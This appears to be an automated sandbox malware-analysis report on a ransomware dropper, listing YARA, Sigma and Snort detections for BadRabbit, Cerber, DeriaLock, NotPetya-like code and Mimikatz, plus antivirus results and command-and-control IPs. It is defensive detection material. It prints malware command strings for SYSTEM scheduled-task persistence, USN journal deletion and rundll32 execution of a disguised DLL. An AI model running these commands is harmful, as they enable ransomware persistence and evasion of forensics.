40.2.Endermanch@Cerber5.exe.400000.0.raw.unpack	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
10.0.Endermanch@BadRabbit.exe.1320000.2.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
4.2.Endermanch@BadRabbit.exe.1320000.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
1.0.Endermanch@BadRabbit.exe.1320000.3.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
27.0.5753.tmp.7ff7cef20000.2.unpack	BadRabbit_Mimikatz_Comp	Auto-generated rule	Florian Roth	0xa848:$s1: %lS%lS%lS:%lS 0xa440:$s2: lsasrv 0xa868:$s3: CredentialKeys 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
27.0.5753.tmp.7ff7cef20000.2.unpack	mimikatz	mimikatz	Benjamin DELPY (gentilkiwi)	0xcaa8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74 0xcab8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74 0xca68:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
27.0.5753.tmp.7ff7cef20000.2.unpack	JoeSecurity_Mimikatz_2	Yara detected Mimikatz	Joe Security
58.2.Endermanch@Cerber5.exe.4e10000.2.raw.unpack	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
4.0.Endermanch@BadRabbit.exe.1320000.3.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
40.2.Endermanch@Cerber5.exe.400000.0.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
32.0.Endermanch@BadRabbit.exe.1320000.3.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
58.0.Endermanch@Cerber5.exe.400000.2.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
10.0.Endermanch@BadRabbit.exe.1320000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
4.2.Endermanch@BadRabbit.exe.1426458.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x5514:$x3: C:\Windows\infpub.dat 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
10.2.Endermanch@BadRabbit.exe.dc6458.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x5514:$x3: C:\Windows\infpub.dat 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
49.0.Endermanch@BadRabbit.exe.1320000.3.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
19.2.Endermanch@Cerber5.exe.1720000.1.raw.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
32.0.Endermanch@BadRabbit.exe.1320000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
4.0.Endermanch@BadRabbit.exe.1320000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
1.2.Endermanch@BadRabbit.exe.140f570.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x5514:$x3: C:\Windows\infpub.dat 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
40.0.Endermanch@Cerber5.exe.400000.1.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
19.0.Endermanch@Cerber5.exe.400000.2.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
49.2.Endermanch@BadRabbit.exe.1586018.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x5514:$x3: C:\Windows\infpub.dat 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
3.3.rundll32.exe.4c2ba0.1.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2a1d8:$d1: \DosDevices\dcrypt 0x2a288:$d2: $dcsys$_fail_%x 0x2a268:$d3: %s\$DC_TRIM_%x$ 0x2a1b8:$d4: \Device\dcrypt 0x2a220:$d5: %s\$dcsys$
19.2.Endermanch@Cerber5.exe.400000.0.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
32.2.Endermanch@BadRabbit.exe.1036698.0.raw.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
58.2.Endermanch@Cerber5.exe.4de0000.1.raw.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
3.2.rundll32.exe.4c2ba0.0.raw.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2b3d8:$d1: \DosDevices\dcrypt 0x2b488:$d2: $dcsys$_fail_%x 0x2b468:$d3: %s\$DC_TRIM_%x$ 0x2b3b8:$d4: \Device\dcrypt 0x2b420:$d5: %s\$dcsys$
10.2.Endermanch@BadRabbit.exe.1320000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
58.2.Endermanch@Cerber5.exe.4e10000.2.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
1.0.Endermanch@BadRabbit.exe.1320000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
1.2.Endermanch@BadRabbit.exe.140f570.1.raw.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
27.0.5753.tmp.7ff7cef20000.0.unpack	BadRabbit_Mimikatz_Comp	Auto-generated rule	Florian Roth	0xa848:$s1: %lS%lS%lS:%lS 0xa440:$s2: lsasrv 0xa868:$s3: CredentialKeys 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
27.0.5753.tmp.7ff7cef20000.0.unpack	mimikatz	mimikatz	Benjamin DELPY (gentilkiwi)	0xcaa8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74 0xcab8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74 0xca68:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
27.0.5753.tmp.7ff7cef20000.0.unpack	JoeSecurity_Mimikatz_2	Yara detected Mimikatz	Joe Security
1.0.Endermanch@BadRabbit.exe.1320000.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
19.0.Endermanch@Cerber5.exe.400000.3.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
4.0.Endermanch@BadRabbit.exe.1320000.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
19.0.Endermanch@Cerber5.exe.400000.1.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
3.2.rundll32.exe.4c2ba0.0.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2a1d8:$d1: \DosDevices\dcrypt 0x2a288:$d2: $dcsys$_fail_%x 0x2a268:$d3: %s\$DC_TRIM_%x$ 0x2a1b8:$d4: \Device\dcrypt 0x2a220:$d5: %s\$dcsys$
3.2.rundll32.exe.444ff8.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0xe828:$x2: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" 0xfdc4:$s3: \\.\pipe\%ws 0xffe0:$s4: fsutil usn deletejournal /D %c: 0xe9e8:$s8: SYSTEM\CurrentControlSet\services\%ws 0x101c0:$s9: process call create "C:\Windows\System32\rundll32.exe 0xfea4:$s10: %ws C:\Windows\%ws,#1 %ws
3.2.rundll32.exe.444ff8.1.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0xffe0:$x5: fsutil usn deletejournal /D %c: 0xfdc4:$s4: \\.\pipe\%ws
10.0.Endermanch@BadRabbit.exe.1320000.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
47.2.rundll32.exe.5c4e70.0.raw.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0xf428:$x2: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" 0x109c4:$s3: \\.\pipe\%ws 0x10be0:$s4: fsutil usn deletejournal /D %c: 0xf5e8:$s8: SYSTEM\CurrentControlSet\services\%ws 0x10dc0:$s9: process call create "C:\Windows\System32\rundll32.exe 0x10aa4:$s10: %ws C:\Windows\%ws,#1 %ws
47.2.rundll32.exe.5c4e70.0.raw.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0x10be0:$x5: fsutil usn deletejournal /D %c: 0x109c4:$s4: \\.\pipe\%ws
40.0.Endermanch@Cerber5.exe.400000.0.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
3.3.rundll32.exe.4c2ba0.0.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2a1d8:$d1: \DosDevices\dcrypt 0x2a288:$d2: $dcsys$_fail_%x 0x2a268:$d3: %s\$DC_TRIM_%x$ 0x2a1b8:$d4: \Device\dcrypt 0x2a220:$d5: %s\$dcsys$
3.3.rundll32.exe.4c2ba0.1.raw.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2b3d8:$d1: \DosDevices\dcrypt 0x2b488:$d2: $dcsys$_fail_%x 0x2b468:$d3: %s\$DC_TRIM_%x$ 0x2b3b8:$d4: \Device\dcrypt 0x2b420:$d5: %s\$dcsys$
49.0.Endermanch@BadRabbit.exe.1320000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
58.0.Endermanch@Cerber5.exe.400000.1.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
3.3.rundll32.exe.4c2ba0.2.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2a1d8:$d1: \DosDevices\dcrypt 0x2a288:$d2: $dcsys$_fail_%x 0x2a268:$d3: %s\$DC_TRIM_%x$ 0x2a1b8:$d4: \Device\dcrypt 0x2a220:$d5: %s\$dcsys$
58.0.Endermanch@Cerber5.exe.400000.3.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
58.2.Endermanch@Cerber5.exe.400000.0.raw.unpack	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
32.2.Endermanch@BadRabbit.exe.1036698.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x5514:$x3: C:\Windows\infpub.dat 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
40.2.Endermanch@Cerber5.exe.4dc0000.1.raw.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
3.3.rundll32.exe.4c2ba0.0.raw.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2b3d8:$d1: \DosDevices\dcrypt 0x2b488:$d2: $dcsys$_fail_%x 0x2b468:$d3: %s\$DC_TRIM_%x$ 0x2b3b8:$d4: \Device\dcrypt 0x2b420:$d5: %s\$dcsys$
27.2.5753.tmp.7ff7cef20000.0.unpack	BadRabbit_Mimikatz_Comp	Auto-generated rule	Florian Roth	0xa848:$s1: %lS%lS%lS:%lS 0xa440:$s2: lsasrv 0xa868:$s3: CredentialKeys 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
27.2.5753.tmp.7ff7cef20000.0.unpack	mimikatz	mimikatz	Benjamin DELPY (gentilkiwi)	0xcaa8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74 0xcab8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74 0xca68:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
27.2.5753.tmp.7ff7cef20000.0.unpack	JoeSecurity_Mimikatz_2	Yara detected Mimikatz	Joe Security
9.2.rundll32.exe.6b5050.0.raw.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0xf428:$x2: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" 0x109c4:$s3: \\.\pipe\%ws 0x10be0:$s4: fsutil usn deletejournal /D %c: 0xf5e8:$s8: SYSTEM\CurrentControlSet\services\%ws 0x10dc0:$s9: process call create "C:\Windows\System32\rundll32.exe 0x10aa4:$s10: %ws C:\Windows\%ws,#1 %ws
9.2.rundll32.exe.6b5050.0.raw.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0x10be0:$x5: fsutil usn deletejournal /D %c: 0x109c4:$s4: \\.\pipe\%ws
19.2.Endermanch@Cerber5.exe.5e70000.2.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
32.0.Endermanch@BadRabbit.exe.1320000.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
32.0.Endermanch@BadRabbit.exe.1320000.2.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
40.2.Endermanch@Cerber5.exe.4df0000.2.raw.unpack	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
1.0.Endermanch@BadRabbit.exe.1320000.2.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
49.2.Endermanch@BadRabbit.exe.1320000.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
10.0.Endermanch@BadRabbit.exe.1320000.3.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
19.0.Endermanch@Cerber5.exe.400000.0.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
4.0.Endermanch@BadRabbit.exe.1320000.2.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
47.2.rundll32.exe.4200000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0xf428:$x2: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" 0x109c4:$s3: \\.\pipe\%ws 0x10be0:$s4: fsutil usn deletejournal /D %c: 0xf5e8:$s8: SYSTEM\CurrentControlSet\services\%ws 0x10dc0:$s9: process call create "C:\Windows\System32\rundll32.exe 0x10aa4:$s10: %ws C:\Windows\%ws,#1 %ws
47.2.rundll32.exe.4200000.1.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0x10be0:$x5: fsutil usn deletejournal /D %c: 0x109c4:$s4: \\.\pipe\%ws
58.2.Endermanch@Cerber5.exe.400000.0.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
3.2.rundll32.exe.7b0000.2.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0xf428:$x2: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" 0x109c4:$s3: \\.\pipe\%ws 0x10be0:$s4: fsutil usn deletejournal /D %c: 0xf5e8:$s8: SYSTEM\CurrentControlSet\services\%ws 0x10dc0:$s9: process call create "C:\Windows\System32\rundll32.exe 0x10aa4:$s10: %ws C:\Windows\%ws,#1 %ws
3.2.rundll32.exe.7b0000.2.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0x10be0:$x5: fsutil usn deletejournal /D %c: 0x109c4:$s4: \\.\pipe\%ws
9.2.rundll32.exe.4220000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0xf428:$x2: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" 0x109c4:$s3: \\.\pipe\%ws 0x10be0:$s4: fsutil usn deletejournal /D %c: 0xf5e8:$s8: SYSTEM\CurrentControlSet\services\%ws 0x10dc0:$s9: process call create "C:\Windows\System32\rundll32.exe 0x10aa4:$s10: %ws C:\Windows\%ws,#1 %ws
9.2.rundll32.exe.4220000.1.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0x10be0:$x5: fsutil usn deletejournal /D %c: 0x109c4:$s4: \\.\pipe\%ws
27.0.5753.tmp.7ff7cef20000.1.unpack	BadRabbit_Mimikatz_Comp	Auto-generated rule	Florian Roth	0xa848:$s1: %lS%lS%lS:%lS 0xa440:$s2: lsasrv 0xa868:$s3: CredentialKeys 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
27.0.5753.tmp.7ff7cef20000.1.unpack	mimikatz	mimikatz	Benjamin DELPY (gentilkiwi)	0xcaa8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74 0xcab8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74 0xca68:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
27.0.5753.tmp.7ff7cef20000.1.unpack	JoeSecurity_Mimikatz_2	Yara detected Mimikatz	Joe Security
49.0.Endermanch@BadRabbit.exe.1320000.2.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
19.2.Endermanch@Cerber5.exe.5e70000.2.raw.unpack	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
1.2.Endermanch@BadRabbit.exe.1320000.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
4.2.Endermanch@BadRabbit.exe.1426458.1.raw.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
40.0.Endermanch@Cerber5.exe.400000.2.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
3.3.rundll32.exe.4c2ba0.2.raw.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2b3d8:$d1: \DosDevices\dcrypt 0x2b488:$d2: $dcsys$_fail_%x 0x2b468:$d3: %s\$DC_TRIM_%x$ 0x2b3b8:$d4: \Device\dcrypt 0x2b420:$d5: %s\$dcsys$
40.0.Endermanch@Cerber5.exe.400000.3.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
19.2.Endermanch@Cerber5.exe.400000.0.raw.unpack	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
44.0.Endermanch@DeriaLock.exe.d80000.0.unpack	JoeSecurity_DeriaLock	Yara detected DeriaLock Ransomware	Joe Security
58.0.Endermanch@Cerber5.exe.400000.0.unpack	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
9.2.rundll32.exe.6b5050.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0xe828:$x2: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" 0xfdc4:$s3: \\.\pipe\%ws 0xffe0:$s4: fsutil usn deletejournal /D %c: 0xe9e8:$s8: SYSTEM\CurrentControlSet\services\%ws 0x101c0:$s9: process call create "C:\Windows\System32\rundll32.exe 0xfea4:$s10: %ws C:\Windows\%ws,#1 %ws
9.2.rundll32.exe.6b5050.0.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0xffe0:$x5: fsutil usn deletejournal /D %c: 0xfdc4:$s4: \\.\pipe\%ws
47.2.rundll32.exe.5c4e70.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0xe828:$x2: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" 0xfdc4:$s3: \\.\pipe\%ws 0xffe0:$s4: fsutil usn deletejournal /D %c: 0xe9e8:$s8: SYSTEM\CurrentControlSet\services\%ws 0x101c0:$s9: process call create "C:\Windows\System32\rundll32.exe 0xfea4:$s10: %ws C:\Windows\%ws,#1 %ws
47.2.rundll32.exe.5c4e70.0.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0xffe0:$x5: fsutil usn deletejournal /D %c: 0xfdc4:$s4: \\.\pipe\%ws
3.2.rundll32.exe.444ff8.1.raw.unpack	NotPetya_Ransomware_Jun17	Detects new NotPetya Ransomware variant from June 2017	Florian Roth	0x10be0:$x5: fsutil usn deletejournal /D %c: 0x109c4:$s4: \\.\pipe\%ws
3.2.rundll32.exe.444ff8.1.raw.unpack	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0xa8f80:$d1: \DosDevices\dcrypt 0xa9030:$d2: $dcsys$_fail_%x 0xa9010:$d3: %s\$DC_TRIM_%x$ 0xa8f60:$d4: \Device\dcrypt 0xa8fc8:$d5: %s\$dcsys$
Click to see the 94 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Execute DLL with spoofed extension

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, ParentProcessId: 5660, ParentProcessName: Endermanch@BadRabbit.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 5364, ProcessName: rundll32.exe

Snort Signatures

ETPRO TROJAN MSIL/DeriaLock Ransomware CnC Activity - Source IP: 192.168.2.6 - Destination IP: 162.55.0.137

Timestamp:	192.168.2.6162.55.0.13749767802824087 09/29/22-14:52:28.844656
SID:	2824087
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ransomware/Cerber Checkin M3 (2) - Source IP: 192.168.2.6 - Destination IP: 93.107.12.0

Timestamp:	192.168.2.693.107.12.05908368932023613 09/29/22-14:50:24.513544
SID:	2023613
Source Port:	59083
Destination Port:	6893
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	Avira: detection malicious, Label: TR/Sirery.A
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Avira: detection malicious, Label: HEUR/AGEN.1227089
Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	Avira: detection malicious, Label: TR/Ransom.pfnaw
Source: C:\Windows\dispci.exe	Avira: detection malicious, Label: TR/Diskcoder.12354
Source: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	Avira: detection malicious, Label: HEUR/AGEN.1240493
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Avira: detection malicious, Label: TR/BAS.Samca.fyzpg
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Avira: detection malicious, Label: TR/Genasom.wzara
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Avira: detection malicious, Label: TR/Diskcoder.ezxim
Source: C:\Users\user\AppData\Local\Temp\Fantom.exe	Avira: detection malicious, Label: TR/AD.HiddenTear.huakh

Multi AV Scanner detection for submitted file

Source: irH9zMhZub.exe	ReversingLabs: Detection: 66%
Source: irH9zMhZub.exe	Virustotal: Detection: 63%	Perma Link
Source: irH9zMhZub.exe	Metadefender: Detection: 27%	Perma Link

Antivirus / Scanner detection for submitted sample

Source: irH9zMhZub.exe

Avira: detected

Multi AV Scanner detection for dropped file

